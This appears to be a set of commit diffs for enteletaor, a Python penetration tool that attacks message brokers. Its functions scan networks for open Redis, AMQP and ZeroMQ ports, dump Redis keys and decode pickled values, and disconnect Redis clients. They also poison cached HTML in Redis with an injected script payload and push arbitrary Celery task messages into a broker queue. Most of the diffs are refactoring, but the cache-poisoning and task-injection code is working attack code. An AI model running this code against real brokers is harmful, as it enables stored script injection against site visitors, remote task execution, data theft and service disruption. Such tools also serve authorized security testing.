if isinstance(value, self.allow_casts):
if not isinstance(value, str):
value = str(value)
value = utf8_decode(value) # unicode(value, 'utf-8')
else:
raise ConversionError(self.messages['convert'].format(value))
return value
def validate_length(self, value):
len_of_value = len(value) if value else 0
if self.max_length is not None and len_of_value > self.max_length:
raise ValidationError(self.messages['max_length'])
if self.min_length is not None and len_of_value < self.min_length:
raise ValidationError(self.messages['min_length'])
# --------------------------------------------------------------------------
# STB Model class
# --------------------------------------------------------------------------
class Model(_Model):
MESSAGES = {
"label": "Console label"
}
BASIC_REVERSE = {
"IntType" : "int",
"URLType" : "str",
"IPv4Type" : "str",
"DateType" : "str",
"HashType" : "str",
"SHA1Type" : "str",
"FileType" : "str",
"LongType" : "int",
"EmailType" : "str",
"FloatType" : "float",
"NumberType" : "int",
"StringType" : "str",
"DecimalType" : "float",
"BooleanType" : "bool",
"DateTimeType": "str",
}
def __init__(self, raw_data=None, deserialize_mapping=None, strict=True, **kwargs):
super(Model, self).__init__(raw_data=raw_data, deserialize_mapping=deserialize_mapping, strict=strict)
for k, v in kwargs.items():
if k in self.keys():
setattr(self, k, v)
# ----------------------------------------------------------------------
def get_basic_types(self):
"""
Get a dict with basic types
"""
results = {}
for name, _type in self._fields.items():
try:
results[name] = self.BASIC_REVERSE[_type.__class__.__name__]
except KeyError:
pass
return results
# ----------------------------------------------------------------------
def get_field_results(self):
"""
Return the name of property that will contains the file results
:return: a string with the name of field of file results
:rtype: str
"""
for name, _type in self._fields.items():
if _type.is_file_results:
return name
return None
if __name__ == '__main__':
class Testing(Model):
p1 = FileType(is_file_results=True)
m1 = Testing()
print(m1.get_field_results())

View File

@@ -55,7 +55,7 @@ def new_module_validate(self):
if func.validator() is False:
self._errors = {}
if type(self._fields[name]) != type(self._fields[name].__type__):
if type(self._fields[name].data) is type(self._fields[name].__type__):
self._errors[name] = ("Data type incorrect or not default value "
"provided. Got %s. Expected: %s" % (
type(self._fields[name].data),
@@ -115,7 +115,8 @@ def _validator(self):
if self.data is None:
return True
else:
to_check = self.default
# to_check = self.default
return False
else:
if not isinstance(to_check, self.__type__):
return False
@@ -133,7 +134,7 @@ StringField.validator = _validator
# ----------------------------------------------------------------------
class IntegerField(_IntegerField):
"""Improved Integer data that checks types"""
__type__ = int
__type__ = six.integer_types
IntegerField.validator = _validator
@@ -164,5 +165,5 @@ BoolField.validator = _validator
# ----------------------------------------------------------------------
class SelectField(_SelectField):
"""Improved bool data that checks types"""
__type__ = str
__type__ = six.text_type
SelectField.validator = _validator

View File

@@ -1,8 +0,0 @@
# -*- coding: utf-8 -*-
class Singleton(object):
def __new__(cls,*args,**kwargs):
if '_inst' not in vars(cls):
cls._inst = super(Singleton,cls).__new__(cls)
return cls._inst

View File

@@ -77,7 +77,10 @@ def find_hooks():
loop_file = loop_file[1:] if loop_file.startswith(".") else loop_file
# Load module info
classes = __import__(loop_file, globals=globals(), locals=locals(), level=loop_file.count("."))
try:
classes = __import__("%s.%s" % (__package__, loop_file), globals=globals(), locals=locals(), level=loop_file.count("."))
except ImportError:
classes = __import__(loop_file, globals=globals(), locals=locals(), level=loop_file.count("."))
# Get Modules instances
for m in dir(classes):

View File

@@ -6,7 +6,7 @@ log = logging.getLogger(__name__)
# --------------------------------------------------------------------------
class IModule:
class IModule(object):
"""Interface for modules"""
name = None
@@ -66,7 +66,10 @@ def find_modules():
loop_file = loop_file[1:] if loop_file.startswith(".") else loop_file
# Load module info
classes = __import__(loop_file, globals=globals(), locals=locals(), level=loop_file.count("."))
try:
classes = __import__("%s.%s" % (__package__, loop_file), globals=globals(), locals=locals(), level=loop_file.count("."))
except ImportError:
classes = __import__(loop_file, globals=globals(), locals=locals(), level=loop_file.count("."))
# Get Modules instances
for m in dir(classes):

View File

@@ -1,42 +0,0 @@
# -*- coding: utf-8 -*-
import six
import logging
from time import sleep
from kombu import Connection
from .utils import list_remote_process
log = logging.getLogger()
# ----------------------------------------------------------------------
def action_proc_raw_dump(config):
log.warning(" - Trying to connect with server...")
url = '%s://%s' % (config.broker_type, config.target)
# with Connection('redis://%s' % REDIS) as conn:
with Connection(url) as conn:
in_queue = conn.SimpleQueue('celery')
while 1:
for remote_process, remote_args in list_remote_process(config, in_queue):
# Show info
log.error("Found process information:")
log.error(" - Remote process name: '%s'" % remote_process)
log.error(" - Input parameters:")
for i, x in enumerate(remote_args):
log.error(" -> P%s: %s" % (i, x))
# Queue is empty -> wait
if config.streaming_mode:
log.error("No more messages from server. Waiting for %s seconds and try again.." % config.interval)
sleep(config.interval)
else:
log.error("No more messages from server. Exiting...")
return

View File

@@ -2,9 +2,9 @@
import logging
from modules import IModule
from libs.core.models import StringField, IntegerField
from libs.core.structs import CommonData
from .. import IModule
from ...libs.core.structs import CommonData
from ...libs.core.models import StringField, IntegerField
from .redis_dump import action_redis_dump
from .redis_shell import action_redis_shell
@@ -24,7 +24,6 @@ class ModuleModel(CommonData):
target = StringField(required=True)
port = IntegerField(default=6379)
db = IntegerField(default=0)
export_results = StringField()
# ----------------------------------------------------------------------

View File

@@ -11,8 +11,10 @@ def parser_redis_dump(parser):
Dump all redis database information
"""
gr = parser.add_argument_group("custom raw dump options")
gr.add_argument("--no-raw", action="store_true", dest="no_raw", default=False,
gr.add_argument("--no-screen", action="store_true", dest="no_screen", default=False,
help="do not show displays raw database info into screen")
gr.add_argument("-e", "--export-results", dest="export_results",
help="export dumped information results")
# ----------------------------------------------------------------------

View File

@@ -1,6 +1,8 @@
# -*- coding: utf-8 -*-
import six
import redis
import string
import logging
from lxml import etree
@@ -58,15 +60,41 @@ def handle_html(config, content):
# --------------------------------------------------------------------------
# Search start and end possition of HTML page
# --------------------------------------------------------------------------
pos_ini = pos_end = None
for i, x in enumerate(content):
if chr(x) == "<":
pos_ini = i
break
tmp_pos = -1
if six.PY2:
if six.u(x) == six.u("<"):
tmp_pos = i
else:
if chr(x) == "<":
tmp_pos = i
# Is printable? to avoid nulls and false '<'
if tmp_pos == i and len(content) != i:
if six.PY2:
if content[i + 1] in string.printable:
pos_ini = i
break
else:
if chr(content[i + 1]) in string.printable:
pos_ini = i
break
# else:
# pos_ini = i
# break
for i, x in enumerate(content[::-1]):
if chr(x) == ">":
pos_end = len(content) - i
break
if six.PY2:
if six.u(x) == six.u("<"):
pos_end = len(content) - i
break
else:
if chr(x) == "<":
pos_end = len(content) - i
break
if pos_ini is None or pos_end is None:
raise ValueError("Not found HTML content into cache")
@@ -74,37 +102,32 @@ def handle_html(config, content):
txt_content = content[pos_ini:pos_end]
# Parse input
tree = etree.fromstring(txt_content, etree.HTMLParser())
tree = etree.fromstring(txt_content, parser=etree.HTMLParser())
doc_root = tree.getroottree()
results = None
# --------------------------------------------------------------------------
# Search insertion points
for point in ("head", "title", "body", "script", "div", "p"):
insert_point = doc_root.find(".//%s" % point)
# --------------------------------------------------------------------------
if insert_point is None:
continue
# Try to find end of script entries
insert_point = doc_root.find(".//script[last()]")
# --------------------------------------------------------------------------
# Add the injection Payload
# --------------------------------------------------------------------------
if config.poison_payload_file is not None:
with open(config.poison_payload_file, "rU") as f:
_f_payload = f.read()
payload = etree.fromstring(_f_payload)
if insert_point is not None:
results = add_injection(config, doc_root, insert_point)
elif config.poison_payload:
payload = etree.fromstring(config.poison_payload)
else:
payload = etree.fromstring("<script>alert('You are vulnerable to broker injection')</script>")
else:
# Try to find othe entry
for point in ("head", "title", "body", "div", "p"):
insert_point = doc_root.find(".//%s" % point)
insert_point.addnext(payload)
if insert_point is None:
continue
# Set results
results = bytes(etree.tostring(doc_root))
results = add_injection(config, doc_root, insert_point)
break
break
# --------------------------------------------------------------------------
# Build results
@@ -112,6 +135,33 @@ def handle_html(config, content):
return results
# ----------------------------------------------------------------------
def add_injection(config, doc_root, insert_point):
# --------------------------------------------------------------------------
# Add the injection Payload
# --------------------------------------------------------------------------
if config.poison_payload_file is not None:
with open(config.poison_payload_file, "rU") as f:
_f_payload = f.read()
payload = etree.fromstring(_f_payload)
elif config.poison_payload:
payload = etree.fromstring(config.poison_payload)
else:
payload = etree.fromstring("<script>alert('You are vulnerable to broker injection')</script>")
insert_point.addnext(payload)
# Set results
tmp_results = etree.tostring(doc_root, method="html", pretty_print=True, encoding=doc_root.docinfo.encoding)
# Codding filters
results = tmp_results.decode(errors="replace").replace("\\u000a", "\n")
return results
# ----------------------------------------------------------------------
def action_redis_cache_poison(config):
"""
@@ -137,10 +187,10 @@ def action_redis_cache_poison(config):
log.error("Looking for caches in '%s'..." % config.target)
for x in cache_keys:
log.warning(" - Possible cache found in key: %s" % str(x))
log.error(" - Possible cache found in key: %s" % str(x))
if not cache_keys:
log.warning(" - No caches found")
log.error(" - No caches found")
# Stop
return
@@ -156,9 +206,19 @@ def action_redis_cache_poison(config):
for val in cache_keys:
content = dump_key(val, con)
try:
_val = val.decode(errors="ignore")
except AttributeError:
_val = val
try:
_content = content.decode(errors="ignore")
except AttributeError:
_content = content
# If key doesn't exist content will be None
if content is None:
log.error(" - Provided key '%s' not found in server" % val)
log.error(" - Provided key '%s' not found in server" % _val)
continue
# --------------------------------------------------------------------------
@@ -168,7 +228,7 @@ def action_redis_cache_poison(config):
if config.poison is True:
# Set injection
try:
modified = handle_html(config, content)
modified = handle_html(config, content) # DO NOT USE _content. Function expect bytes, not str.
except ValueError as e:
log.error(" - Can't modify cache content: " % e)
continue
@@ -177,18 +237,18 @@ def action_redis_cache_poison(config):
# Injection was successful?
if modified is None:
log.warning(" - Can't modify content: ensure that content is HTML")
log.error(" - Can't modify content: ensure that content is HTML")
continue
# Set injection into server
con.setex(val, 200, modified)
log.error(" - Poisoned cache key '%s' at server '%s'" % (val, config.target))
log.error(" - Poisoned cache key '%s' at server '%s'" % (_val, config.target))
else:
# If not poison enabled display cache keys
log.error(" -> Key: '%s' - " % val)
log.error(" -> Content:\n %s" % content)
log.error(" -> Key: '%s'" % _val)
log.error(" -> Content:\n %s" % _content)
if not cache_keys:
log.error(" - No cache keys found in server: Can't poison remote cache.")
log.error(" - No cache keys found in server.")

View File

@@ -22,22 +22,29 @@ def action_redis_server_disconnect(config):
# Disconnect all clients?
if config.disconnect_all:
for c in clients:
con.client_kill(c)
try:
con.client_kill(c)
log.error(" - Client '%s' was disconnected" % c)
except redis.exceptions.ResponseError:
log.error(" - Client '%s' is not connected" % c)
log.error(" - Disconnected client '%s'" % c)
# Disconnect only one user
else:
# Check client format
if config.client is None or ":" not in config.client:
log.error("Invalid client format. Client must be format: IP:PORT, i.e: 10.211.55.2:61864")
log.error(" <!> Invalid client format. Client must be format: IP:PORT, i.e: 10.211.55.2:61864")
return
try:
_c = clients[config.client]
try:
con.client_kill(_c)
con.client_kill(_c)
log.error(" - Client '%s' was disconnected" % _c)
except redis.exceptions.ResponseError:
log.error(" - Client '%s' is not connected" % _c)
log.error(" - Disconnected client '%s'" % _c)
except KeyError:
log.warning("Client '%s' doesn't appear to be connected to server" % config.client)
log.error(" <!> Client '%s' doesn't appear to be connected to server" % config.client)

View File

@@ -19,8 +19,18 @@ def action_redis_discover_dbs(config):
log.error("Discovered '%s' DBs at '%s':" % (config.target, con.config_get("databases")['databases']))
discovered_dbs = set()
for db_name, db_content in six.iteritems(con.info("keyspace")):
log.error(" - %s - %s keys" % (db_name.upper(), db_content['keys']))
discovered_dbs.add(db_name.upper())
for i in six.moves.range((int(con.config_get("databases")['databases']) - len(con.info("keyspace")))):
log.error(" - DB%s - Empty" % str(i))
_db_name = "DB%s" % i
if _db_name in discovered_dbs:
continue
log.error(" - %s - Empty" % _db_name)

View File

@@ -1,32 +1,143 @@
# -*- coding: utf-8 -*-
import six
import json
import redis
import base64
import logging
import binascii
from six.moves.cPickle import loads
log = logging.getLogger()
# ----------------------------------------------------------------------
def dump_keys(con):
for key in con.keys('*'):
key_type = con.type(key).lower()
val = None
if key_type == b"kv":
if key_type in (b"kv", b"string"):
val = con.get(key)
if key_type == b"hash":
elif key_type in (b"hash", b"unacked", b"unacked_index"):
val = con.hgetall(key)
if key_type == b"zet":
elif key_type == b"zet":
val = con.zrange(key, 0, -1)
if key_type == b"set":
elif key_type in (b"set", b"list"):
val = con.mget(key)
elif key_type == b"list":
con.lrange(key, 0, -1)
if val is not None:
if isinstance(val, list):
if val[0] is None:
continue
yield val
yield key, val
# --------------------------------------------------------------------------
# Human parsers
# --------------------------------------------------------------------------
def decode_object(key, val, ident=5):
if isinstance(val, dict):
log.error(' "%s":' % key)
log.error(" {")
_decode_object(val, ident)
log.error(" }")
else:
log.error(' "%s": "%s"' % (key, val))
# ----------------------------------------------------------------------
def _decode_object(val, ident=5):
"""
Decode recursively string
"""
_new_ident = ident + 1
for k, v in six.iteritems(val):
# convert value to original type -> JSON
try:
_transformed_info = json.loads(v.decode("utf-8"))
except (binascii.Error, AttributeError, ValueError):
_transformed_info = v
# --------------------------------------------------------------------------
# Try to display in "human" format
# --------------------------------------------------------------------------
if isinstance(_transformed_info, list):
log.error('%s"%s":' % (" " * ident, k))
for x in _transformed_info:
if isinstance(x, dict):
# Open data
log.error("%s{" % (" " * _new_ident))
_decode_object(x, _new_ident + 2)
log.error("%s}" % (" " * _new_ident))
else:
log.error('%s"%s"' % ((" " * ident), x))
# Dict handler
elif isinstance(_transformed_info, dict):
log.error('%s"%s":' % ((" " * ident), k))
log.error("%s{" % (" " * _new_ident))
_decode_object(v, _new_ident + 2)
log.error("%s}" % (" " * _new_ident))
# Basic type as value
else:
try:
use_obj = _transformed_info.encode()
except (TypeError, AttributeError, binascii.Error):
use_obj = _transformed_info
# Is Pickle encoded?
try:
_pickle_decoded = loads(use_obj)
# Is pickled
log.error('%s"%s":' % ((" " * ident), k))
log.error("%s{" % (" " * _new_ident))
_decode_object(_pickle_decoded, _new_ident + 2)
log.error("%s}" % (" " * _new_ident))
except Exception as e:
if "BadPickleGet" == e.__class__.__name__:
log.info(
" <!!> Can't decode value for key '%s' because Pickle protocol 3 o 4 used, and it's "
"incompatible with Python 2" % k)
# Try again decoding in base64
try:
_b64_decoded = base64.decodebytes(use_obj)
# Is pickled
log.error('%s"%s":' % ((" " * ident), k))
log.error("%s{" % (" " * _new_ident))
_decode_object(loads(_b64_decoded), _new_ident + 2)
log.error("%s}" % (" " * _new_ident))
except Exception:
# Transform is not possible -> plain string
log.error('%s"%s": "%s"' % ((" " * ident), k, use_obj))
# ----------------------------------------------------------------------
@@ -41,17 +152,37 @@ def action_redis_dump(config):
# Export results?
export_file = None
if config.export_results:
export_file = open(config.export_results, "w")
export_file_name = None
# Fix filename
if config.export_results:
export_file_name = config.export_results if ".json" in config.export_results else "%s.json" % config.export_results
if config.export_results:
export_file = open(export_file_name, "w")
log.error(" - Storing information into '%s'" % export_file_name)
elif config.no_screen is True:
log.error(" <!> If results will not be displayed, you must to indicate output file for results.")
return
registers = False
for i, t_val in enumerate(dump_keys(con)):
key = t_val[0]
val = t_val[1]
for val in dump_keys(con):
# Display results?
if config.no_raw is False:
log.warning(val)
if config.no_screen is False:
decode_object(key, val)
# Dump to file?
if export_file is not None:
export_file.write(str(val))
export_file.write("%s: %s" % (key, str(val)))
# There are registers
registers = True
if registers is False:
log.error(" - No information to dump in database")
# Close file descriptor
if export_file is not None:

View File

@@ -2,10 +2,10 @@
import logging
from modules import IModule
from .. import IModule
from libs.core.structs import CommonData
from libs.core.models import StringField, BoolField, IntegerField
from ...libs.core.structs import CommonData
from ...libs.core.models import StringField, BoolField, IntegerField, FloatField
from .scan_main import action_scan_main
@@ -17,7 +17,9 @@ class ModuleModel(CommonData):
ports = StringField(default="5672,6379,5555", label="comma separated ports")
target = StringField(required=True)
own_ips = BoolField(label="Try to find all IPs registered for this company")
concurrency = IntegerField(label="maximum parallels scans", default=10)
concurrency = IntegerField(label="maximum parallels scans", default=20)
output = StringField(label="output file, in JSON format")
timeout = FloatField(label="timeout for socket connections", default=0.2)
# ----------------------------------------------------------------------

View File

@@ -2,6 +2,7 @@
import six
import zmq
import json
import redis
import socket
import logging
@@ -11,6 +12,7 @@ import amqp.connection
from functools import partial
from collections import defaultdict
from threading import Thread, BoundedSemaphore
from .patch import patch_transport
@@ -27,6 +29,8 @@ logging.getLogger('amqp').setLevel(100)
log = logging.getLogger()
OPEN_SERVICES = defaultdict(dict)
# ----------------------------------------------------------------------
def _do_scan(config, sem, host):
@@ -45,24 +49,35 @@ def _do_scan(config, sem, host):
for port in config.ports.split(","):
# Check each serve
for server, handle in six.iteritems(handlers):
for server_type, handle in six.iteritems(handlers):
log.info(" >> Trying to find %s service in '%s' port '%s'." % (server_type, host, port))
try:
log.debug(" >> Trying '%s' port '%s'" % (host, port))
# Try to check if port is open
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
s.settimeout(config.timeout)
result = s.connect_ex((host, int(port)))
except socket.gaierror as e:
log.warning("%s : %s error: %s" % (server, port, e))
log.debug("%s : %s error: %s" % (server_type, port, e))
continue
finally:
s.close()
# Is port open?
if result == 0:
log.info(" <i> Port '%s' is open in '%s'" % (port, host))
if handle(host, port, config) is True:
log.error(" <!!> Open '%s' server found in port '%s'" % (server, port))
log.error(" <!!> Open '%s' server found in port '%s' at '%s'" % (server_type, port, host))
OPEN_SERVICES[host][server_type] = dict(
state="open",
port=port
)
else:
log.debug(" <i> Port %s is closed" % port)
@@ -106,6 +121,30 @@ def action_scan_main(config):
for t in threads:
t.join()
# --------------------------------------------------------------------------
# Display results
# --------------------------------------------------------------------------
if OPEN_SERVICES:
log.error(" - Open services found:")
for host, content in six.iteritems(OPEN_SERVICES):
log.error(" -> Host - %s" % host)
for server_type, server_info in six.iteritems(content):
log.error(" * %s/TCP [%s]" % (server_info['port'], server_type))
else:
log.error(" - No open services found")
# --------------------------------------------------------------------------
# Export results
# --------------------------------------------------------------------------
if config.output is not None:
_output_path = "%s.json" % config.output if ".json" not in config.output else config.output
with open(_output_path, "w") as f:
json.dump(OPEN_SERVICES, f)
log.error(" - Output results saved into: %s" % _output_path)
# --------------------------------------------------------------------------
def build_targets(config):
@@ -113,7 +152,7 @@ def build_targets(config):
results = set()
# Split targets
for t in config.target.split("-"):
for t in config.target.split(","):
try:
results.update(str(x) for x in ipaddress.ip_network(t, strict=False))
except ValueError:
@@ -133,7 +172,7 @@ def build_targets(config):
for v in val:
log.debug(" -> Detected registered network '%s'. Added for scan." % v)
results.update(str(x) for x in ipaddress.ip_network(v, strict=False))
results.update(str(x) for x in ipaddress.ip_network(six.u(v), strict=False))
except KeyError:
# Invalid domain
log.debug(" <ii> Error while try to extract domain: '%s'" % t)
@@ -162,7 +201,7 @@ def build_targets(config):
# Add CDIR to result
scan_target = "%s%s" % (host_ip, "/%s" % _target_cdir[1] if len(_target_cdir) > 1 else "")
results.update(str(x) for x in ipaddress.ip_network(scan_target, strict=False))
results.update(str(x) for x in ipaddress.ip_network(six.u(scan_target), strict=False))
return results

View File

@@ -1,17 +1,18 @@
# -*- coding: utf-8 -*-
import logging
from modules import IModule
from .. import IModule
from libs.core.structs import CommonData
from libs.core.models import IntegerField, StringField, SelectField
from ...libs.core.structs import CommonData
from ...libs.core.models import StringField, SelectField
from .cmd_actions import parser_proc_raw_dump, parser_proc_list_process, parser_proc_inject_process
from .proc_remove import action_proc_remove
from .proc_raw_dump import action_proc_raw_dump
from .proc_list_process import action_proc_list_process
from .proc_inject_process import action_proc_inject_process
from .cmd_actions import parser_proc_raw_dump, parser_proc_list_tasks, parser_taks_inject_process
from .tasks_remove import action_proc_remove
from .tasks_raw_dump import action_proc_raw_dump
from .tasks_list_process import action_proc_list_tasks
from .tasks_inject_process import action_task_inject_process
log = logging.getLogger()
@@ -19,9 +20,9 @@ log = logging.getLogger()
# ----------------------------------------------------------------------
class ModuleModel(CommonData):
target = StringField(required=True)
export_results = StringField(default="")
import_results = StringField(default=None)
db = StringField(default=None, label="only for Redis: database to use")
process_manager = SelectField(default="celery", choices=[("celery", "Celery")],
label="process manager running in backend")
broker_type = SelectField(default="redis", choices=[
("redis", "Redis server"),
("zmq", "ZeroMQ"),
@@ -41,15 +42,15 @@ class RemoteProcessModule(IModule):
cmd_args=parser_proc_raw_dump,
action=action_proc_raw_dump
),
'list-process': dict(
help="list remote process and their params",
cmd_args=parser_proc_list_process,
action=action_proc_list_process
'list-tasks': dict(
help="list remote tasks and their params",
cmd_args=parser_proc_list_tasks,
action=action_proc_list_tasks
),
'inject': dict(
help="list remote process and their params",
cmd_args=parser_proc_inject_process,
action=action_proc_inject_process
help="inject a new task into broker",
cmd_args=parser_taks_inject_process,
action=action_task_inject_process
),
'remove': dict(
help="remove remote processes in server",
@@ -58,7 +59,7 @@ class RemoteProcessModule(IModule):
),
}
name = "proc"
name = "tasks"
description = "try to discover and handle processes in remote MQ/Brokers"
# ----------------------------------------------------------------------

View File

@@ -13,10 +13,11 @@ def parser_proc_raw_dump(parser):
help="although all information be dumped do not stop")
gr.add_argument("-I", dest="interval", type=float, default=4,
help="timeout interval between tow connections")
gr.add_argument("--output", dest="output", help="store dumped information into file")
# ----------------------------------------------------------------------
def parser_proc_list_process(parser):
def parser_proc_list_tasks(parser):
parser.add_argument("-N", "--no-stream", dest="no_stream", action="store_true", default=False,
help="force to not listen until message is received")
@@ -29,7 +30,7 @@ def parser_proc_list_process(parser):
# ----------------------------------------------------------------------
def parser_proc_inject_process(parser):
def parser_taks_inject_process(parser):
gr = parser.add_argument_group("process importing options")
gr.add_argument("-f", "--function-file", dest="function_files", type=str, required=True,

View File

@@ -14,10 +14,10 @@ log = logging.getLogger()
# ----------------------------------------------------------------------
def action_proc_inject_process(config):
def action_task_inject_process(config):
if config.function_files is None:
log.warning(" - input .json file with process files is needed")
log.error(" - input .json file with process files is needed")
return
# --------------------------------------------------------------------------
@@ -26,7 +26,7 @@ def action_proc_inject_process(config):
with open(config.function_files, "r") as f:
f_info = json.load(f)
log.warning(" - Building process...")
log.error(" - Building process...")
# Search and inject process
injections = []
@@ -38,7 +38,7 @@ def action_proc_inject_process(config):
# Fill process information
# --------------------------------------------------------------------------
inject_process = {
"args": [x for x, y in six.iteritems(parameters)],
"args": [y for x, y in six.iteritems(parameters)],
"callbacks": None,
"chord": None,
"errbacks": None,
@@ -47,7 +47,7 @@ def action_proc_inject_process(config):
"id": uuid.uuid1(),
"kwargs": {},
"retries": 0,
"task": "tasks.%s" % p["function"],
"task": p["function"],
"taskset": None,
"timelimit": [
None,
@@ -68,7 +68,7 @@ def action_proc_inject_process(config):
with Connection(url) as conn:
in_queue = conn.SimpleQueue('celery')
log.warning(" - Sending processes to '%s'" % config.target)
log.error(" - Sending processes to '%s'" % config.target)
for i, e in enumerate(injections, 1):
log.warning(" %s) %s" % (i, e['task']))

View File

@@ -14,7 +14,7 @@ log = logging.getLogger()
# ----------------------------------------------------------------------
def action_proc_list_process(config):
def action_proc_list_tasks(config):
log.warning(" - Trying to connect with server...")
@@ -29,7 +29,7 @@ def action_proc_list_process(config):
# Get remote process
first_msg = True
while 1:
for remote_process, remote_args in list_remote_process(config, in_queue):
for remote_process, remote_args, _ in list_remote_process(config, in_queue):
if remote_process not in process_info:
process_info[remote_process] = remote_args
@@ -65,7 +65,10 @@ def action_proc_list_process(config):
# Save template
# --------------------------------------------------------------------------
# Build path in current dir
export_path = "%s.json" % os.path.abspath(config.template)
export_path = os.path.abspath(config.template)
if ".json" not in export_path:
export_path += ".json"
# dumps
json.dump(export_data, open(export_path, "w"))

View File

@@ -0,0 +1,83 @@
# -*- coding: utf-8 -*-
import six
import csv
import logging
from time import sleep
from kombu import Connection
from .utils import list_remote_process
log = logging.getLogger()
# ----------------------------------------------------------------------
def action_proc_raw_dump(config):
log.warning(" - Trying to connect with server...")
url = '%s://%s' % (config.broker_type, config.target)
f_output = None
csv_output = None
if config.output is not None:
fixed_f = "%s.csv" % config.output if ".csv" not in config.output else config.output
f_output = open(fixed_f, "a")
csv_output = csv.writer(f_output)
log.error(" - Storing results at '%s'" % fixed_f)
# Write first col
csv_output.writerow([
"# Task name",
"Parameters (position#value)"
])
already_processed = set()
# with Connection('redis://%s' % REDIS) as conn:
with Connection(url) as conn:
in_queue = conn.SimpleQueue('celery')
while 1:
for remote_task, remote_args, task_id in list_remote_process(config, in_queue):
# Task already processed?
if task_id not in already_processed:
# Track
already_processed.add(task_id)
# Show info
log.error(" Found process information:")
log.error(" - Remote tasks name: '%s'" % remote_task)
log.error(" - Input parameters:")
to_csv = [remote_task]
for i, x in enumerate(remote_args):
log.error(" -> P%s: %s" % (i, x))
# Prepare to store JSON
to_csv.append("%s#%s" % (i, x))
# Store
if csv_output is not None:
csv_output.writerow(to_csv)
# Queue is empty -> wait
if config.streaming_mode:
log.error(" -> No more messages from server. Waiting for %s seconds and try again.." % config.interval)
sleep(config.interval)
else:
log.error(" -> No more messages from server. Exiting...")
return
# Close file descriptor
if f_output is not None:
f_output.close()
csv_output.close()

View File

@@ -23,4 +23,4 @@ def action_proc_remove(config):
for _ in get_remote_messages(config, in_queue, False):
pass
log.error(" - All processes removed from '%s'" % config.target)
log.error(" - All tasks removed from '%s'" % config.target)

View File

@@ -32,13 +32,13 @@ def get_param_type(value):
return "list"
elif type(value) == bytes:
try:
value.decode()
six.u(value)
return "bytes"
except Exception:
return "str"
elif type(value) == str:
elif type(value) in (str, unicode if six.PY2 else ""):
return "str"
else:
return "object"
@@ -138,10 +138,10 @@ def list_remote_process(config, queue):
# Read info
if msg_id not in already_processed:
remote_process = deserialized['task'].split(".")[-1]
remote_process = deserialized['task']
remote_args = deserialized['args']
# Store as processed
already_processed.add(msg_id)
yield remote_process, remote_args
yield remote_process, remote_args, msg_id

View File

@@ -1,5 +1,5 @@
six
flask
lxml
wtforms
eventlet
colorlog

View File

@@ -23,6 +23,8 @@
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import sys
from os.path import dirname, join
from setuptools import setup, find_packages
@@ -30,10 +32,14 @@ from setuptools import setup, find_packages
with open(join(dirname(__file__), 'requirements.txt')) as f:
required = f.read().splitlines()
if sys.version_info[0] == 2:
bin_name = "enteletaor"
else:
bin_name = "enteletaor3"
setup(
name='enteletaor',
version='1.0.0',
version="1.0.0",
install_requires=required,
url='https://github.com/cr0hn/enteletaor',
license='BSD',
@@ -42,8 +48,8 @@ setup(
packages=find_packages(),
include_package_data=True,
entry_points={'console_scripts': [
'enteletaor = enteletaor_lib.enteletaor:main',
]},
'%s = enteletaor_lib.enteletaor:main' % bin_name
]},
description='Message Queue & Broker Injection tool',
long_description=open('README.rst', "r").read(),
classifiers=[